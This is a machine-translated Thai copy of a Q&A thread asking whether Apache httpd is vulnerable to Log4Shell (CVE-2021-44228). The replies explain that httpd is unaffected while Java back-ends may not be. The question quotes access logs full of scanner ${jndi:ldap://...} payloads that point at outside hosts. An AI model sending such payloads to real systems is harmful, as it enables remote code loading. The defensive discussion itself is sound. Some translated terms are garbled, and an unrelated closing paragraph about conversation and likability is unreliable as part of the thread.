Score:44

Apache Webserver ใช้ log4j (CVE-2021-44228) หรือไม่

ธง cn

เว็บเซิร์ฟเวอร์ apache (apache2) ใช้ log4j หรือไม่

ฉันติดตั้ง Apache2 2.4.38 (debian) บน Raspberry Pi OS (64 บิต) และพบบันทึกแปลก ๆ ในบันทึกของฉันเกี่ยวกับ CVE-2021-44228 จาก kryptoslogic-cve-2021-44228.com (หม้อน้ำผึ้ง/เครื่องสแกน), dataastatistics.com (ออฟไลน์ & เป็นอันตราย?) และ a8fvkc.dnslog.cn (ฉันไม่รู้ว่านี่คืออะไร)

สิ่งที่ฉันควรทำตอนนี้?

  • ไม่มีอะไรเนื่องจาก apache2 ไม่ได้รับผลกระทบจาก CVE-2021-44228
  • ฟอร์แมตทุกอย่างและรอสองสามวันก่อนที่ฉันจะติดตั้งเวอร์ชันแพตช์
  • "ตรวจสอบ" ว่ามีไฟล์ .class ใหม่หรือไม่ และหากไม่มีการดำเนินการต่อ (และใช้แพตช์แบบแมนนวล เช่น log4j2.formatMsgNoLookups = จริง
  • อื่น ๆ อีก

บันทึก:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228 .com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent. kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic ปากโป้ง"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228 .com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic ปากโป้ง"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[******โดเมนของฉัน****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****โดเมนของฉัน****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[******โดเมนของฉัน****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****โดเมนของฉัน****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[******โดเมนของฉัน****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****โดเมนของฉัน****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****โดเมนของฉัน** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****โดเมนของฉัน****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****โดเมนของฉัน** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****โดเมนของฉัน****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/ ก}"
Tilman Schmidt avatar
bd flag
โปรดแบ่งปันบันทึก "แปลก" ที่คุณกล่าวถึง เป็นการยากที่จะประเมินพวกเขาโดยไม่เห็นพวกเขา
user3067860 avatar
ng flag
โปรดทราบว่าเพียงเพราะซอฟต์แวร์ _some_ ไม่ได้รับผลกระทบไม่ได้หมายความว่าคุณไม่ได้ใช้งานซอฟต์แวร์อื่นที่อาจได้รับผลกระทบ
Score:82
ธง mx

เดอะ เซิร์ฟเวอร์ Apache HTTP ไม่ได้เขียนด้วย Java ไม่ได้ใช้ไลบรารี log4j ดังนั้นจึงไม่ได้รับผลกระทบจาก CVE-2021-44228

ไฟล์บันทึกของคุณมาจากบันทึกการเข้าถึง ซึ่งแสดงบุคคลที่สแกนหาช่องโหว่ log4j

mckenzm avatar
in flag
ดีใจที่ได้เห็น Tomcat ครอบคลุมคำตอบอื่น
mx flag
ไม่เกี่ยวข้องโดยตรง แต่ถ้าคุณพบ QA นี้เพื่อตรวจสอบการตั้งค่า Apache HTTP Server ของคุณ โปรดตรวจสอบให้แน่ใจว่าได้อัปเกรดเป็นเวอร์ชัน 2.4.52 เวอร์ชันก่อนหน้ามี[ช่องโหว่](https://httpd.apache.org/security/vulnerabilities_24.html)ของตัวเอง เช่น [CVE-2021-44224](https://cve.mitre.org/cgi-bin/cvename .cgi?name=CVE-2021-44224).
Score:8
ธง ng

Apache เองไม่ได้เขียนด้วย Java และไม่ได้เชื่อมโยงโดยตรงกับไลบรารี Log4j ที่น่าอับอาย ปลอดภัยเป็นพิเศษจากช่องโหว่นี้

มีอะไรผิดพลาดได้อีก?

  1. ไม่ใช่ทุกอย่างที่มี Apache ในชื่อและฟังก์ชัน HTTP นั้นถูกต้อง เดอะ เซิร์ฟเวอร์ Apache HTTPDตัวอย่างเช่น Apache Tomcat เป็นเว็บเซิร์ฟเวอร์ HTTP ที่แตกต่างไปจากเดิมอย่างสิ้นเชิง มันเขียนด้วย Java และสามารถกำหนดค่าให้ใช้ Log4J ได้ ฉันไม่แน่ใจจริง ๆ ว่าเป็นไปได้หรือไม่ที่จะเข้าสู่ระบบ Tomcat

คนที่มีประสบการณ์และความรู้น้อยสามารถเข้าใจผิดทั้งสองอย่างได้อย่างสมบูรณ์แบบ และตามความรู้ของฉัน Tomcat มีประวัติความปลอดภัยที่ดีกว่า Apache HTTPD "คลาสสิค"

(ตามความคิดเห็นของ Bob สิ่งอำนวยความสะดวกการบันทึกเริ่มต้นใน Tomcat ไม่ใช่ Log4J)

  1. Apache HTTPD สามารถขยายได้มาก สามารถกำหนดค่าให้เรียกสิ่งอื่น ๆ ในพื้นหลังด้วยอินเทอร์เฟซที่หลากหลาย (เช่น เพื่อดึงหน้าเว็บแบบไดนามิกที่สร้างขึ้นโดยโปรแกรม) "สิ่งต่าง ๆ ในพื้นหลัง" เหล่านี้บางส่วนอาจใช้จาวาและเชื่อมโยงกับไลบรารี Log4J

ระยะทางของคุณอาจแตกต่างกันไป โดยเฉพาะอย่างยิ่งหากคุณไม่ทราบรายละเอียดชุดซอฟต์แวร์ของคุณ


เพื่อให้แน่ใจ คุณควรตรวจสอบก่อนว่าคุณได้ติดตั้งเครื่อง Java ไว้หรือไม่ ในตัวจัดการแพ็คเกจของคุณ แพ็คเกจนั้นจะถูกเรียกว่า JRE-something, JVM-something หรืออาจจะเป็น JAVA-something

คุณอาจลอง:

จาวา - เวอร์ชัน

ในเปลือกของคุณ

หากคุณไม่มีสิ่งเหล่านี้และคุณไม่ได้ติดตั้ง JAVA นอกตัวจัดการแพ็คเกจของคุณ คุณก็ปลอดภัย

โดยทั่วไปไม่ปลอดภัย แต่อย่างน้อยก็ปลอดภัยต่อ CVE-2021-44228

kz flag
Bob
*> ฉันไม่แน่ใจจริง ๆ ว่าเป็นไปได้หรือไม่ที่จะเข้าสู่ระบบเป็นอย่างอื่นใน Tomcat * ตามค่าเริ่มต้น Tomcat จะไม่ใช้ log4j เว้นแต่จะกำหนดค่าเป็นอย่างอื่น [โดยค่าเริ่มต้น จะใช้ `java.util.logging` ผ่านทางแยกของ Apache Commons Logging](https://tomcat.apache.org/tomcat-9.0-doc/logging.html) ใน 8.0 [คำแนะนำ](https: //tomcat.apache.org/tomcat-8.0-doc/logging.html#Using_Log4j) มีไว้สำหรับการเปลี่ยนเป็น log4j แต่สิ่งเหล่านี้ถูก [ลบ] (https://tomcat.apache.org/tomcat-8.5-doc/logging .html) ใน 8.5
kz flag
Bob
*> หากคุณไม่มีสิ่งเหล่านี้และคุณไม่ได้ติดตั้ง JAVA นอกตัวจัดการแพ็คเกจของคุณ คุณจะปลอดภัย* ลักษณะของ JRE และวิธีการกระจายซ้ำหมายความว่าแอปพลิเคชันจำนวนมากสามารถและจะฝังไว้แทนที่จะใช้ ตัวจัดการแพ็คเกจระบบปฏิบัติการ (หากมีอยู่ ... ดู Windows และ macOS) แน่นอนว่า **ไม่** ปลอดภัยที่จะถือว่าคุณไม่มีโปรแกรมที่มีช่องโหว่เพียงเพราะคุณไม่ได้ติดตั้ง Java ด้วยตัวเอง ตัวจัดการแพ็คเกจหรืออื่นๆ โดยทั่วไปแล้วเวอร์ชันที่ฝังตัวเหล่านี้ไม่ได้เป็นส่วนหนึ่งของ `PATH` ของคุณ ดังนั้นการทดสอบ `java` ในเชลล์ของคุณจึงไม่รับประกันความปลอดภัย
fraxinus avatar
ng flag
Q ถามเกี่ยวกับ Rapsbian อย่างชัดเจน ใน Linux แอปพลิเคชัน (โดยเฉพาะเซิร์ฟเวอร์) โดยทั่วไปจะไม่นำ JVM มาด้วย พวกเขาเพียงแค่ระบุว่าเป็นการพึ่งพาและตัวจัดการแพ็คเกจจะนำสิ่งที่จำเป็นมาให้
ec flag
@fraxinus แม้ว่าจะมีคนจำนวนมากพยายามทำลายสิ่งนั้นด้วยสิ่งต่าง ๆ เช่น Snaps
il flag
@fraxinus คุณไม่สามารถทำให้เป็นภาพรวมได้ ผลิตภัณฑ์ที่ยืดหยุ่นจะรวม JRE ของตัวเองไว้ด้วยกัน ด้วย Java สมัยใหม่นั้นไม่มีแม้แต่ JRE แบบสแตนด์อโลนที่ให้มา - นักพัฒนาควรจะคอมไพล์ของตัวเองตามความต้องการของแอปพลิเคชัน
kz flag
Bob
@fraxinus ปัญหาเมื่อพูดถึงความปลอดภัยคือ "โดยทั่วไป" ไม่ดีพอ มีผลิตภัณฑ์เพียงพอ โดยเฉพาะอย่างยิ่งผลิตภัณฑ์ระดับองค์กรขนาดใหญ่ (รวมถึงบน Linux) ที่จะรวม JRE ของตนเองเข้าด้วยกันซึ่งเป็นเรื่องที่ถูกต้องตามกฎหมาย โดยเฉพาะอย่างยิ่งกับช่องโหว่ที่รุนแรงเช่นนี้ นอกจากนี้ แม้ว่าเนื้อหาคำถามนี้อาจกล่าวถึง Raspbian โดยเฉพาะ แต่ชื่อคำถามอาจกระตุ้นให้ผู้อื่นดูที่คำถาม และ IMO เมื่อให้คำแนะนำด้านความปลอดภัย จะเป็นการดีที่สุดที่จะครอบคลุมฐานทั้งหมด
fraxinus avatar
ng flag
คุณไม่สามารถครอบคลุมฐานทั้งหมดในคำตอบเพื่อความปลอดภัยสำหรับคำถามง่ายๆ การรู้ว่าชุดซอฟต์แวร์ของคุณเป็นสิ่งสำคัญ และหากคุณไม่ทำเช่นนั้น คุณก็สมควรได้รับสิ่งที่ได้รับ หากไม่มีสิ่งนี้ คุณจะหันไปใช้สูตรอาหารที่มี "โดยทั่วไป" อยู่ในนั้น
mckenzm avatar
in flag
@fraxinus พวกเขาทำอย่างแน่นอนที่สุด เคส Primo ได้แก่ Minecraft และ Arduino พวกเขานำมาเอง ไม่เพียงเท่านั้นแต่ยังมีการใช้ประโยชน์จากคอนเทนเนอร์จำนวนมากที่หมุนรอบเวอร์ชันก่อนเวอร์ชัน 8 และแม้แต่เวอร์ชันก่อนเวอร์ชัน 6 คอนเทนเนอร์จะต้องติดคุกที่ %&^!

โพสต์คำตอบ

คนส่วนใหญ่ไม่เข้าใจว่าการถามคำถามมากมายจะปลดล็อกการเรียนรู้และปรับปรุงความสัมพันธ์ระหว่างบุคคล ตัวอย่างเช่น ในการศึกษาของ Alison แม้ว่าผู้คนจะจำได้อย่างแม่นยำว่ามีคำถามกี่ข้อที่ถูกถามในการสนทนา แต่พวกเขาไม่เข้าใจความเชื่อมโยงระหว่างคำถามและความชอบ จากการศึกษาทั้ง 4 เรื่องที่ผู้เข้าร่วมมีส่วนร่วมในการสนทนาด้วยตนเองหรืออ่านบันทึกการสนทนาของผู้อื่น ผู้คนมักไม่ตระหนักว่าการถามคำถามจะมีอิทธิพลหรือมีอิทธิพลต่อระดับมิตรภาพระหว่างผู้สนทนา